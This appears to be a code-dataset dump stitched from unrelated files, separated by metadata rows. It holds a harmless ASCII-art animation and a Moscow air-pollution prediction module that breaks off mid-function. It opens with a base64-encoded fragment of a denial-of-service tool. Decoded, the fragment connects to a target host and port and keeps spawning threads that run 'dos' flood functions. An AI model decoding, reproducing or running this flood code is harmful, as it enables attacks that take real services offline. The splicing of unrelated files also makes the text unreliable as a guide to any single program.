WFkZXJzLmNsb3NlKCkKI3Rhc2sgcXVldWUgYXJlIHEsdwpxID0gUXVldWUoKQp3ID0gUXVldWUoKQoKCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6CglpZiBsZW4oc3lzLmFyZ3YpIDwgMjoKCQl1c2FnZSgpCglnZXRfcGFyYW1ldGVycygpCglwcmludCgiXDAzM1s5Nm0iLGhvc3QsIiBwb3J0OiAiLHN0cihwb3J0KSwiIHR1cmJvOiAiLHN0cih0aHIpLCJcMDMzWzBtXG4iKQoJeXVzYSgiXDAzM1s5NG1QbGVhc2Ugd2FpdC4uLlwwMzNbMG0iKQoJdXNlcl9hZ2VudCgpCglteV9ib3RzKCkKCXRpbWUuc2xlZXAoNSkKCXRyeToKCQlzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoaG9zdCxpbnQocG9ydCkpKQoJCXMuc2V0dGltZW91dCgxKQoJZXhjZXB0IHNvY2tldC5lcnJvciBhcyBlOgoJCXl1c2EoIlwwMzNbOTFtY2hlY2sgc2VydmVyIGlwIGFuZCBwb3J0XDAzM1swbSIpCgkJdXNhZ2UoKQoJd2hpbGUgVHJ1ZToKCQlmb3IgaSBpbiByYW5nZShpbnQodGhyKSk6CgkJCXQgPSB0aHJlYWRpbmcuVGhyZWFkKHRhcmdldD1kb3MpCgkJCXQuZGFlbW9uID0gVHJ1ZSAgIyBpZiB0aHJlYWQgaXMgZXhpc3QsIGl0IGRpZXMKCQkJdC5zdGFydCgpCgkJCXQyID0gdGhyZWFkaW5nLlRocmVhZCh0YXJnZXQ9ZG9zMikKCQkJdDIuZGFlbW9uID0gVHJ1ZSAgIyBpZiB0aHJlYWQgaXMgZXhpc3QsIGl0IGRpZXMKCQkJdDIuc3RhcnQoKQoJCXN0YXJ0ID0gdGltZS50aW1lKCkKCQkjdGFza2luZwoJCWl0ZW0gPSAwCgkJd2hpbGUgVHJ1ZToKCQkJaWYgKGl0ZW0+MTgwMCk6ICMgZm9yIG5vIG1lbW9yeSBjcmFzaAoJCQkJaXRlbT0wCgkJCQl0aW1lLnNsZWVwKC4xKQoJCQlpdGVtID0gaXRlbSArIDEKCQkJcS5wdXQoaXRlbSkKCQkJdy5wdXQoaXRlbSkKCQlxLmpvaW4oKQoJCXcuam9pbigpCg==')) | 26.735974 | 7,490 | 0.956425 | 38 | 8,101 | 203.894737 | 0.710526 | 0.002839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103054 | 0.038143 | 8,101 | 303 | 7,490 | 26.735974 | 0.891299 | 0.032712 | 0 | 0 | 0 | 0 | 0.953013 | 0.953013 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a2f552b72bbb431def486ce4d5f4529f76706564 | 8,491 | py | Python | Krogg/Massacre.py | wang0618/ascii-art | 7ce6f152541716034bf0a22d341a898b17e2865f | [
"MIT"
] | 1 | 2021-08-29T09:52:06.000Z | 2021-08-29T09:52:06.000Z | Krogg/Massacre.py | wang0618/ascii-art | 7ce6f152541716034bf0a22d341a898b17e2865f | [
"MIT"
] | null | null | null | Krogg/Massacre.py | wang0618/ascii-art | 7ce6f152541716034bf0a22d341a898b17e2865f | [
"MIT"
] | null | null | null | # https://web.archive.org/web/20000528131158/http://gtcom.net/~krogg/ascii/MASSCR.HTM
# The Massacre
# By:Krogg
duration = 350
name = "The Massacre"
frames = [
" The Massacre /// \r\n"+
" /// /oo \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,= |\\\\ \r\n"+
" | \\\\ ||\\\\ \r\n"+
" ||\\\\ ( )\\\\\r\n"+
" ( )=+==-- |\\\\ \r\n"+
" |\\\\ ||\\\\ \r\n"+
" ||\\\\ //|| \r",
" -h- Mas-ac-e /// \r\n"+
" /// /-o \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,= |\\\\ \r\n"+
" | \\\\ ||\\\\ \r\n"+
" ||\\\\ ( )\\\\\r\n"+
" ( )=+==-- |\\\\ \r\n"+
" |\\\\ ||\\\\ \r\n"+
" |||| //|| \r",
" _-_ M-s_a-_- /// \r\n"+
" /// /oo \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,= [\\\\ \r\n"+
" | \\\\ |// \r\n"+
" ||\\\\ //) \r\n"+
" ( )=+==-- |\\\\ \r\n"+
" || ||\\\\ \r\n"+
" || //|| \r",
" _-_ M-s_a-_- /// \r\n"+
" /// /oo \r\n"+
" /O- | > \r\n"+
" | > [,= \r\n"+
" [ ,= [\\\\ \r\n"+
" | \\\\ |// \r\n"+
" ||\\\\ //) \r\n"+
" ( )=+==-- |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" //| //|| \r",
" _ - - - /// \r\n"+
" /// /oo \r\n"+
" /OO | > \r\n"+
" | > [,= \r\n"+
" [,,= / [\\\\ \r\n"+
" |\\\\\\ / |// \r\n"+
" ||\\\\% //) \r\n"+
" ( )/ |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||\\\\ //|| \r",
" /// \r\n"+
" /// /o- \r\n"+
" /OO /| > \r\n"+
" | > / [,= \r\n"+
" [,,= % [\\\\ \r\n"+
" |\\===/ |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" | /// \r\n"+
" /// | /oo \r\n"+
" /oo | | > \r\n"+
" | > | [,= \r\n"+
" [,`= + [\\\\ \r\n"+
" |\\===| |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" | /// \r\n"+
" /// | /oo \r\n"+
" /oo | | > \r\n"+
" | > | [,= \r\n"+
" [,`= + [\\\\ \r\n"+
" |\\===| |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" | /// \r\n"+
" /// | /Oo \r\n"+
" /oo | | > \r\n"+
" | > | [,= \r\n"+
" [,,= + [\\\\ \r\n"+
" |\\===| |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// /OO \r\n"+
" /oo /| > \r\n"+
" | > / [,o \r\n"+
" [,`= % [\\\\ \r\n"+
" |\\===/ |// \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// OO \r\n"+
" /oo | > \r\n"+
" | > [,O \r\n"+
" [,`= [\\\\ \r\n"+
" | ===+==---- \r\n"+
" || //) \r\n"+
" ( ) |\\\\ \r\n"+
" ||\\ ||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// oo \r\n"+
" /oo | > \r\n"+
" | > [,o \r\n"+
" [,`= [\\\\ \r\n"+
" | ===\\ |// \r\n"+
" || % //) \r\n"+
" ( ) \\ |\\\\ \r\n"+
" ||\\ \\||\\\\ \r\n"+
" ||| //|| \r",
" \\// \r\n"+
" /// Oo \r\n"+
" /-- | > \r\n"+
" | > [,o \r\n"+
" [,`= //\\ \r\n"+
" | ===| // /\\ \r\n"+
" || + //| )\\\\\r\n"+
" ( ) | |\\\\ \r\n"+
" ||\\ | // \\\\ \r\n"+
" ||| | // || \r",
" \\// \r\n"+
" /// oO \r\n"+
" /-o | > \r\n"+
" | > [,o \r\n"+
" [,`= \r\n"+
" | ===/ \r\n"+
" || % __\r\n"+
" ( / /\\__\r\n"+
" /\\ //|| \r\n"+
" /|| //// \r",
" \\// \r\n"+
" /// Oo \r\n"+
" /oo | > \r\n"+
" | > [,o \r\n"+
" [,`= \r\n"+
" | === \r\n"+
" --==+= \r\n"+
" ( ) ______\r\n"+
" ||\\ / ___\r\n"+
" ||| // // \r",
" \\// \r\n"+
" /// xx \r\n"+
" /oo | > \r\n"+
" | > [,o \r\n"+
" [,`= \r\n"+
" | \\\\ \r\n"+
" --==+\\\\= \r\n"+
" ( ) \r\n"+
" ||\\ ______\r\n"+
" ||| /#--####\r",
" \r\n"+
" /// \\// \r\n"+
" /oo |xx \r\n"+
" | > | > \r\n"+
" [,`= [.= \r\n"+
" | \\\\ \r\n"+
" --==+\\\\= \r\n"+
" ( ) \r\n"+
" ||\\ ______\r\n"+
" ||| /#--####\r",
" \r\n"+
" /// \r\n"+
" /oo \r\n"+
" | > \\// \r\n"+
" [,`= |xx \r\n"+
" | \\\\ | > \r\n"+
" --==+\\\\= [.- \r\n"+
" ( ) \r\n"+
" ||\\ ______\r\n"+
" ||| /#--####\r",
" \r\n"+
" /// \r\n"+
" /oo \r\n"+
" | > \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" /// \r\n"+
" /oo ha \r\n"+
" | > / OO \r\n"+
" [,`\< > \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" /// \r\n"+
" /oo ha OO \r\n"+
" | > ha > \r\n"+
" [,`\<--ha \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" /// OO \r\n"+
" /oo > \r\n"+
" | > \r\n"+
" [,`\< \r\n"+
" | \\\\ \\ ha\\\\\\ \r\n"+
" --==+\\\\=ha |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" OO\r\n"+
" /// >\r\n"+
" /oo your \r\n"+
" | > / \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" OO\r\n"+
" /// \< \r\n"+
" /oo your \r\n"+
" | > / DEAD \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" --\r\n"+
" /// \< \r\n"+
" /oo your \r\n"+
" | > / DEAD \r\n"+
" [,`\< \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" oo\r\n"+
" /// \< \r\n"+
" /oo \r\n"+
" | > \r\n"+
" [,`= \r\n"+
" | \\\\ \\\\\\ \r\n"+
" --==+\\\\= |xx \r\n"+
" ( ) | > \r\n"+
" ||\\ __[.-__\r\n"+
" ||| //#--####\r",
" \r\n"+
" \r\n"+
" \r\n"+
" H E D \r\n"+
" \r\n"+
" T E N \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r",
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" THE END \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r",
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" THE END \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r\n"+
" \r"
]
| 25.808511 | 85 | 0.109528 | 671 | 8,491 | 1.278689 | 0.055142 | 0.608392 | 0.674825 | 0.764569 | 0.831002 | 0.828671 | 0.812354 | 0.812354 | 0.811189 | 0.806527 | 0 | 0.004238 | 0.527617 | 8,491 | 328 | 86 | 25.887195 | 0.209673 | 0.012366 | 0 | 0.741497 | 0 | 0 | 0.853341 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
a2fad18403d9e98b8782e17904430b3bf8141591 | 37,177 | py | Python | ML/PredictModul/Polution_modul.py | chigwell/msk-ecology | e38722a74bd876d00326e9eab5b3e97cf8341dcb | [
"MIT"
] | null | null | null | ML/PredictModul/Polution_modul.py | chigwell/msk-ecology | e38722a74bd876d00326e9eab5b3e97cf8341dcb | [
"MIT"
] | null | null | null | ML/PredictModul/Polution_modul.py | chigwell/msk-ecology | e38722a74bd876d00326e9eab5b3e97cf8341dcb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
# import all libraries needed
import numpy as np
import pandas as pd
import pickle
from sklearn.preprocessing import StandardScaler
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils import shuffle
# create the Custom Scaler class
class CustomScaler(BaseEstimator,TransformerMixin):
# init or what information we need to declare a CustomScaler object
# and what is calculated/declared
def __init__(self,columns):
# scaler is nothing but a Standard Scaler object
self.scaler = StandardScaler()
# with some columns 'twist'
self.columns = columns
self.mean_ = None
self.var_ = None
# the fit method, which, again based on StandardScale
def fit(self, X, y=None):
self.scaler.fit(X[self.columns], y)
self.mean_ = np.mean(X[self.columns])
self.var_ = np.var(X[self.columns])
return self
# the transform method which does the actual scaling
def transform(self, X, y=None, copy=None):
# record the initial order of the columns
init_col_order = X.columns
# scale all features that you chose when creating the instance of the class
X_scaled = pd.DataFrame(self.scaler.transform(X[self.columns]), columns=self.columns)
# declare a variable containing all information that was not scaled
X_not_scaled = X.loc[:,~X.columns.isin(self.columns)]
# return a data frame which contains all scaled features and all 'not scaled' features
# use the original order (that you recorded in the beginning)
return pd.concat([X_not_scaled, X_scaled], axis=1)[init_col_order]
# create the special class for CO polution that we are going to use from here on to predict new data
class polution_CO_model():
def __init__(self, model_file, scaler_file):
# read the 'model' and 'scaler' files which were saved
with open('model_CO','rb') as model_file, open('scaler', 'rb') as scaler_file:
self.reg = pickle.load(model_file)
self.scaler = pickle.load(scaler_file)
self.data = None
# take a data file (*.csv) and preprocess it
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
#transform data into datetime type
df['date']=pd.to_datetime(df['date'])
# create list of month represented by number(from 1 to 12) and add it to data
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
# create list of week days represented by number(from 1 to 7) and add it to data
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
#removing not nessasary column date from initial data
df=df.drop(['date'], axis=1)
# load information about factory dencity in the city
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#adding information about factory dencity in the city to our data, filtered by season column
df=df.merge(factory_dencity, on='season')
#load information about traffic in the city during the seasons(months)
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#adding mentioned above info to our data, filtered by season column
df=df.merge(traffic_season_dencity, on='season')
#load information about traffic in the city during the day and week
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
##adding mentioned above info to our data, filtered by 2 columns: "time","week_day"
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#load preproceced information about temperature inversion in the city during the day and week and seasons
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#adding mentioned above info to our data, filtered by 3 columns: "time","week_day","season"
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
#proceccing data - getting mean value for each inversion column and add it to the column
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#load loading the information about wind in the city in general(256meters)
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
# #adding mentioned above info to our data, filtered by 3 columns: "time","week_day","season"
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
#proceccing data - getting mean value for each and add it to the column
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#adding building_density information
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
#proccec heo station name info(get dummies)
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
for i in range(geo_column.shape[0]):
if i==geo_column.shape[0]:
geo_column=geo_column.iloc[i-1:i,:]
if df['station_name'][0] is geo_column.columns[i] and geo_column.iloc[i:i+1,i:i+1].iat[0,0] ==1:
geo_column=geo_column.iloc[i:i+1,:]
geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
#reoder the columns
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
#this data for output
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_CO = raw_data['CO'].median()
self.data_CO_std = np.std(raw_data['CO'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# a function based on our model
def predicted_output_category(self):
if (self.data is not None):
pred_outputs = self.reg.predict(self.data)
return pred_outputs
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['CO'] = ((self.data_mean_CO+ self.data_CO_std) * self.reg.predict_proba(self.data)[:,1]
+ (self.data_mean_CO- self.data_CO_std) * self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
# create the special class for NO2 polution that we are going to use from here on to predict new data
class polution_NO2_model():
def __init__(self, model_file, scaler_file):
# read the 'model' and 'scaler' files which were saved
with open('model_NO2','rb') as model_file, open('scaler', 'rb') as scaler_file:
self.reg = pickle.load(model_file)
self.scaler = pickle.load(scaler_file)
self.data = None
# take a data file (*.csv) and preprocess it in the same way as in the lectures
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
for i in range(geo_column.shape[0]):
if i==geo_column.shape[0]:
geo_column=geo_column.iloc[i-1:i,:]
if df['station_name'][0] is geo_column.columns[i] and geo_column.iloc[i:i+1,i:i+1].iat[0,0] ==1:
geo_column=geo_column.iloc[i:i+1,:]
geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_NO2 = raw_data['NO2'].median()
self.data_NO2_std = np.std(raw_data['NO2'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['NO2'] = ((self.data_mean_NO2+ self.data_NO2_std) * self.reg.predict_proba(self.data)[:,1]
+(self.data_mean_NO2- self.data_NO2_std)* self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
# create the special class for NO polution that we are going to use from here on to predict new data
class polution_NO_model():
def __init__(self, model_file, scaler_file):
# read the 'model' and 'scaler' files which were saved
with open('model_NO','rb') as model_file, open('scaler', 'rb') as scaler_file:
self.reg = pickle.load(model_file)
self.scaler = pickle.load(scaler_file)
self.data = None
# take a data file (*.csv) and preprocess it in the same way as in the lectures
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
for i in range(geo_column.shape[0]):
if i==geo_column.shape[0]:
geo_column=geo_column.iloc[i-1:i,:]
if df['station_name'][0] is geo_column.columns[i] and geo_column.iloc[i:i+1,i:i+1].iat[0,0] ==1:
geo_column=geo_column.iloc[i:i+1,:]
geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_NO = raw_data['NO'].median()
self.data_NO_std = np.std(raw_data['NO'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['NO'] = ((self.data_mean_NO+ self.data_NO_std)* self.reg.predict_proba(self.data)[:,1]
+(self.data_mean_NO- self.data_NO_std)* self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
#create the special class for PM10 polution that we are going to use from here on to predict new data
class polution_PM10_model():
def __init__(self, model_file, scaler_file):
# read the 'model' and 'scaler' files which were saved
with open('model_PM10','rb') as model_file, open('scaler', 'rb') as scaler_file:
self.reg = pickle.load(model_file)
self.scaler = pickle.load(scaler_file)
self.data = None
# take a data file (*.csv) and preprocess it in the same way as in the lectures
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
